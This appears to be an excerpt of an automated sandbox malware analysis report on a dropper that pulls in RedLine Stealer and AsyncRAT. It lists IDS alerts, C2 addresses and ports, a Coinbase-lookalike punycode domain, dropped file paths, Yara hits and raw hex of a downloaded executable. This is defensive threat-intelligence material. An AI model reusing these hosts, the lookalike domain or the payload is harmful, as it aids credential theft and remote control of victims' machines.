                      Source: Binary string: ntkrnlmp.pdb source: Temp.txt.6.dr, Temp.txt.9.dr
                      Source: Binary string: winload_prod.pdb\ source: Temp.txt.6.dr, Temp.txt.9.dr
                      Source: Binary string: C:\Users\Netboy FX\Desktop\BitcoinMiner\BitcoinMiner\obj\Release\BitcoinMiner.pdbr source: xj40xovMsm.exe
                      Source: Binary string: ntkrnlmp.pdb\ source: Temp.txt.6.dr, Temp.txt.9.dr
                      Source: Binary string: C:\Users\Netboy FX\Desktop\BitcoinMiner\BitcoinMiner\obj\Release\BitcoinMiner.pdb source: xj40xovMsm.exe
                      Source: Binary string: costura.dotnetzip.pdb.compressed|||DotNetZip.pdb|565BABCBCD978AF66FE1150CC58FDEAFC9815822|622080 source: explorer.exe, 00000002.00000003.1848102224.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, 3CBD.tmp.Installer.exe, 00000005.00000000.1848901548.0000000000EE2000.00000002.00000001.01000000.0000000C.sdmp, 3CBD.tmp.Installer.exe.2.dr, accc.exe.5.dr
                      Source: Binary string: costura.dotnetzip.pdb.compressed`E source: accc.exe, 00000020.00000002.2548612553.0000000002823000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: WINLOA~1.PDBwinload_prod.pdbtmpDx source: 62AB.tmp.build.exe, 00000014.00000002.2313201654.00000000012B8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: p.pdb.compressed source: accc.exe, 00000020.00000002.2548612553.0000000002823000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.dotnetzip.pdb.compressed8 source: 3CBD.tmp.Installer.exe, 00000005.00000002.1941590624.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 0000000B.00000002.3143963860.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000020.00000002.2548612553.0000000002823000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A187F1C FindFirstFileW,CopyFileW,RegOpenKeyExW,SetFileAttributesW,FindNextFileW,FindClose,0_2_00007FF68A187F1C
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A184F64 SHGetFolderPathW,FindFirstFileW,FindNextFileW,0_2_00007FF68A184F64
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3C6350 lstrcpy,lstrcatA,CreateDirectoryA,GetLastError,FindFirstFileA,lstrcpy,lstrcatA,lstrcatA,lstrcpy,lstrcatA,lstrcatA,lstrcmp,lstrcmp,CreateDirectoryA,GetLastError,CopyFileA,FindNextFileA,2_2_0F3C6350
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA334F64 SHGetFolderPathW,FindFirstFileW,FindNextFileW,47_2_00007FF6AA334F64
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA337F1C FindFirstFileW,CopyFileW,RegOpenKeyExW,SetFileAttributesW,FindNextFileW,FindClose,47_2_00007FF6AA337F1C
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B07F1C FindFirstFileW,CopyFileW,RegOpenKeyExW,SetFileAttributesW,FindNextFileW,FindClose,52_2_00007FF7C9B07F1C
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B04F64 SHGetFolderPathW,FindFirstFileW,FindNextFileW,52_2_00007FF7C9B04F64
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE484F64 SHGetFolderPathW,FindFirstFileW,FindNextFileW,53_2_00007FF7AE484F64
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE487F1C FindFirstFileW,CopyFileW,RegOpenKeyExW,SetFileAttributesW,FindNextFileW,FindClose,53_2_00007FF7AE487F1C
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07C7F1C FindFirstFileW,CopyFileW,RegOpenKeyExW,SetFileAttributesW,FindNextFileW,FindClose,55_2_00007FF7C07C7F1C
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07C4F64 SHGetFolderPathW,FindFirstFileW,FindNextFileW,55_2_00007FF7C07C4F64
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 4x nop then jmp 0113A28Ah10_2_0113A057
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 4x nop then jmp 01135989h10_2_011356F8
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 4x nop then jmp 01135F19h10_2_01135D7D
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 4x nop then jmp 01134115h10_2_01133C98
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 4x nop then inc dword ptr [ebp-24h]10_2_0113F3C9
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 4x nop then inc dword ptr [ebp-30h]10_2_011387D8
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 4x nop then jmp 05715A2Ah10_2_05715950
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 4x nop then mov eax, dword ptr [ebp-0Ch]10_2_057109C8

                      Networking

                      barindex
                      Source: TrafficSnort IDS: 2054070 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M2 192.168.2.4:49731 -> 188.114.97.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49734 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49735 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49736 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49739 -> 192.3.140.185:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49742 -> 64.31.40.18:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49745 -> 192.3.140.185:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49747 -> 192.3.140.185:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49750 -> 192.3.140.185:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49752 -> 192.3.140.185:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49753 -> 192.3.140.185:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49760 -> 75.119.203.100:80
                      Source: TrafficSnort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.4:49760 -> 75.119.203.100:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49762 -> 192.3.140.185:80
                      Source: TrafficSnort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.4:49762 -> 192.3.140.185:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49764 -> 192.3.140.185:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49766 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49769 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49770 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49772 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49773 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49775 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49778 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.4:49779 -> 94.232.249.204:1912
                      Source: TrafficSnort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49779 -> 94.232.249.204:1912
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49781 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 94.232.249.204:1912 -> 192.168.2.4:49779
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49782 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49783 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49784 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49785 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49786 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 94.232.249.204:1912 -> 192.168.2.4:49779
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49788 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49789 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49790 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49791 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49792 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49793 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49795 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49796 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49798 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2035595 ET TROJAN Generic AsyncRAT Style SSL Cert 94.232.249.204:7707 -> 192.168.2.4:49797
                      Source: TrafficSnort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 94.232.249.204:7707 -> 192.168.2.4:49797
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49799 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49800 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49802 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49803 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49804 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49805 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49806 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49807 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49808 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49810 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49812 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49814 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49815 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49816 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49817 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49818 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49820 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49821 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49823 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49825 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49828 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49829 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49833 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49835 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49836 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49839 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49840 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49842 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49843 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49845 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49846 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49847 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49848 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49849 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49850 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49851 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49854 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49855 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49856 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49860 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49864 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49867 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49870 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49871 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49873 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49875 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49877 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49878 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49881 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49884 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49886 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49893 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49896 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49900 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49901 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49904 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49906 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49907 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49908 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49909 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49911 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49912 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49913 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49915 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49916 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49917 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49918 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49919 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49921 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49922 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49923 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49925 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49927 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49929 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49932 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49936 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49939 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49940 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49941 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49943 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49944 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49945 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49947 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49949 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49950 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49951 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49953 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49954 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49955 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49956 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49957 -> 188.114.96.3:80
                      Source: TrafficSnort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49959 -> 188.114.96.3:80
                      Source: C:\Windows\explorer.exeNetwork Connect: 64.31.40.18 80Jump to behavior
                      Source: C:\Windows\explorer.exeNetwork Connect: 75.119.203.100 80Jump to behavior
                      Source: C:\Windows\explorer.exeNetwork Connect: 192.3.140.185 80Jump to behavior
                      Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.3 80Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 94.232.249.204 7707
                      Source: Malware configuration extractorURLs: {"result":200
                      Source: unknownDNS query: name: pastebin.com
                      Source: DNS query: auth.xn--conbase-sfb.xyz
                      Source: DNS query: auth.xn--conbase-sfb.xyz
                      Source: DNS query: auth.xn--conbase-sfb.xyz
                      Source: unknownDNS query: name: api.telegram.org
                      Source: Yara matchFile source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.5087.tmp.update.exe.2aa51fc.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED
                      Source: global trafficTCP traffic: 192.168.2.4:49777 -> 94.232.249.204:6660
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 06 Jul 2024 11:27:08 GMTContent-Length: 270848Connection: keep-aliveLast-Modified: Mon, 01 Jul 2024 05:33:50 GMTETag: "42200-61c28f1291b41"Accept-Ranges: bytesCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dio18RgX4e%2BgBH3CnXvOdCtF%2FCUvrDnB8exXY23l2626dehfOl0jLUqs7ufIWfVbjs%2FeBCGOzlCs7KznmYyLADhEnae1k74oZpeph5LVKczU6Xj9SInbwG0o%2BoJGYqvu9Cql3jWhikhSvRs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89ef3e6b8c4b8c1d-EWRalt-svc: h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fd cb 1a 09 b9 aa 74 5a b9 aa 74 5a b9 aa 74 5a b9 aa 75 5a c1 aa 74 5a 45 dd cd 5a be aa 74 5a 7d 6f b9 5a b0 aa 74 5a 7d 6f bb 5a 84 aa 74 5a 7d 6f ba 5a 14 aa 